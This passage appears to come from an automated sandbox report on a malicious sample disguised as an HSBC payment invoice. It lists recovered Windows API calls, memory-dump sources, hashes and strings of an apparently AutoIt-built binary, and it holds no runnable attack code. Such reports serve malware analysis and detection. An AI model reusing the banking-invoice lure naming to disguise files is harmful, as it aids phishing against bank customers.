                    • SysAllocString.OLEAUT32(00000000), ref: 00EDE123
                    • SysAllocString.OLEAUT32 ref: 00EDE144
                    • SysFreeString.OLEAUT32 ref: 00EDE14D
                    • SysAllocString.OLEAUT32(?), ref: 00EDE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$Free
                    • String ID:
                    • API String ID: 1313759350-0
                    • Opcode ID: 45e86dcf0d5a13dd7b09985ab885263deae0f4d0da6a5d2d910a937686e1bd66
                    • Instruction ID: 6ef7b96b47ac4add2cd5934d9938395b314f82565df0116398598b3ed85ede47
                    • Opcode Fuzzy Hash: 45e86dcf0d5a13dd7b09985ab885263deae0f4d0da6a5d2d910a937686e1bd66
                    • Instruction Fuzzy Hash: 9C213135605208AFDB20AFA8DC88DAB77ECFB09764B108126F915DB760DA709C469B64
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                    • _wcstok.LIBCMT ref: 00EEEEFF
                    • _wcscpy.LIBCMT ref: 00EEEF8E
                    • _memset.LIBCMT ref: 00EEEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: c8903154537a1fd99998bada6f4fd8eea74b5648e84f3c842bff80948a966289
                    • Instruction ID: 3f7b3c820d604e8e486564f51445104b57d4e985b366d91d66208aaf1accc5fe
                    • Opcode Fuzzy Hash: c8903154537a1fd99998bada6f4fd8eea74b5648e84f3c842bff80948a966289
                    • Instruction Fuzzy Hash: 9DC18F716083449FC724EF24C881A6AB7E4FF85314F14596DF89DAB2A2DB70ED45CB82
                    APIs
                      • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                      • Part of subcall function 00ED85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                      • Part of subcall function 00ED85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                      • Part of subcall function 00ED85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                      • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                    • GetLengthSid.ADVAPI32(?,00000000,00ED8977), ref: 00ED8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00ED8DB8
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00ED8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00ED8977), ref: 00ED8DEC
                    • HeapFree.KERNEL32(00000000), ref: 00ED8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 169236558-0
                    • Opcode ID: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                    • Instruction ID: ca72b9217ee1cdd1fb8f83c4093a2fd8830bb7e407a5339223b4e9e516a06dab
                    • Opcode Fuzzy Hash: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                    • Instruction Fuzzy Hash: 3F11DC31500608FFDB209FA4CD08BAE7BBEFF54319F10412AE885A3291CB32A905DB60
                    APIs
                      • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                      • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F0C1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 00F0C1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 00F0C1F6
                    • EndPath.GDI32(00000000), ref: 00F0C206
                    • StrokePath.GDI32(00000000), ref: 00F0C216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                    • Instruction ID: 4c4a2550992616aeb1f60c0e9dc231d8b1664d5a5d73b4a9587ab74385075c7e
                    • Opcode Fuzzy Hash: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                    • Instruction Fuzzy Hash: 2811097640014CBFDB119F90DC88FAA7FADFF19364F048021BE189A5A1C7719D59EBA0
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                    • Instruction ID: 94c2afdbd8c9965763a72eb67f687946f27249bfc0c1f16a8e2ae9908a5ad908
                    • Opcode Fuzzy Hash: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                    • Instruction Fuzzy Hash: 89016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00EE56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                    • Instruction ID: 217a4be08c786e9b55c9fcf2f70d8771d4b6e338990c9fbd656a01b13140547c
                    • Opcode Fuzzy Hash: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                    • Instruction Fuzzy Hash: F8F01D3224115DBBE7315BA29C0DEAB7A7CFBC6B15F000169FA05D14509AA11A0596B5
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00EE74E5
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00EE74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E91044,?,?), ref: 00EE7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E91044,?,?), ref: 00EE7510
                      • Part of subcall function 00EE6ED7: CloseHandle.KERNEL32(00000000,?,00EE751D,?,00E91044,?,?), ref: 00EE6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7523
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                    • Instruction ID: d5517d2f7e880c7739bb27479eb3b115607d3d912f206ceda49089b1f6fbe06c
                    • Opcode Fuzzy Hash: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                    • Instruction Fuzzy Hash: 22F0823A14071AEBDB312B64FC8C9EB7B3AFF45302B001531F642A18B4CB755909DB90
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EF8928
                    • CharUpperBuffW.USER32(?,?), ref: 00EF8A37
                    • VariantClear.OLEAUT32(?), ref: 00EF8BAF
                      • Part of subcall function 00EE7804: VariantInit.OLEAUT32(00000000), ref: 00EE7844
                      • Part of subcall function 00EE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00EE784D
                      • Part of subcall function 00EE7804: VariantClear.OLEAUT32(00000000), ref: 00EE7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 8b3390dee910f842c17fef03c357808f2601ab4ffdd5cf9f9654971d534c576f
                    • Instruction ID: c8294cecde5d1c6b220264bf8944e65c001ca9d3a8d7dc03e22de38df69d085e
                    • Opcode Fuzzy Hash: 8b3390dee910f842c17fef03c357808f2601ab4ffdd5cf9f9654971d534c576f
                    • Instruction Fuzzy Hash: 92919E75608305DFC714EF24C58496ABBE4EFC8314F04596EF99AAB362DB30E906CB52
                    APIs
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                    • _memset.LIBCMT ref: 00EE3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EE3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: c82cd615666a32182151034deb029f8e0f6cf2e147beae7e89ddaae4761c2137
                    • Instruction ID: 08be7c0ed94e9063c25ab368cb63f96f39630a16b112c7e37db4567d5cbfef26
                    • Opcode Fuzzy Hash: c82cd615666a32182151034deb029f8e0f6cf2e147beae7e89ddaae4761c2137
                    • Instruction Fuzzy Hash: 7251013160A3889ED7249F39C848A6BBBE8EF45368F04292DF895F3191DB70CE449752
                    APIs
                    • _memset.LIBCMT ref: 00EE2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EE2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00EE2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F46890,00000000), ref: 00EE2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                    • Instruction ID: 0e332d9a0cf7b2917a3397d2f5af398d3ef5dbde3cd8ed4621ff50acbb240770
                    • Opcode Fuzzy Hash: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                    • Instruction Fuzzy Hash: 2D41BF302043859FD724DF25DC44B5ABBE8BF85324F14461DFA65A7291D770E904CB92
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                      • Part of subcall function 00E879AB: _memmove.LIBCMT ref: 00E879F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                    • Instruction ID: 55cda04dbcbe8e06526932b65b35a76ffbcd153038cfa0ebc329876e8158edbf
                    • Opcode Fuzzy Hash: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                    • Instruction Fuzzy Hash: 7831C3715082199BCF00EF54CC809FEB7F5FF05324B10962AE969B7691CB71E906CB80
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ED93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ED9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ED9439
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: e685f7e596a041231a7b72bc6195df4b24ef59627d8dc8e3391d9597f07f54ef
                    • Instruction ID: 3dfbeb1a900a1280f0e93640088c16a2ef908f2c6cbf283b4a881b5d8ad8087a
                    • Opcode Fuzzy Hash: e685f7e596a041231a7b72bc6195df4b24ef59627d8dc8e3391d9597f07f54ef
                    • Instruction Fuzzy Hash: 0C21E471A00108AEDB14AB70CC858FFB7B8EF05760B14521AF929B72E2DB75594B9610
                    APIs
                      • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                      • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                      • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F066D0
                    • LoadLibraryW.KERNEL32(?), ref: 00F066D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F066EC
                    • DestroyWindow.USER32(?), ref: 00F066F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                    • Instruction ID: e5aea13638594fa44174b7ab1d1b1f0f7b07edd320d8add2cd53446f9d045672
                    • Opcode Fuzzy Hash: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                    • Instruction Fuzzy Hash: C1218B7160020AABEF104F64EC80EAB37ADEB59378F104629F911DA1E0DB72CC61B760
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00EE705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 00EE70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EE70DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                    • Instruction ID: e2397e376cdfc7955bff22e8446b5b67d6d49d8717c18912b049993d53ec1a58
                    • Opcode Fuzzy Hash: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                    • Instruction Fuzzy Hash: BE217C7460424DABDF209F6AE805A9A7BA8BF54724F205A19F8E0E72D0E7B09940DB50
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00EE712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 00EE716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EE71A8
                    Memory Dump Source
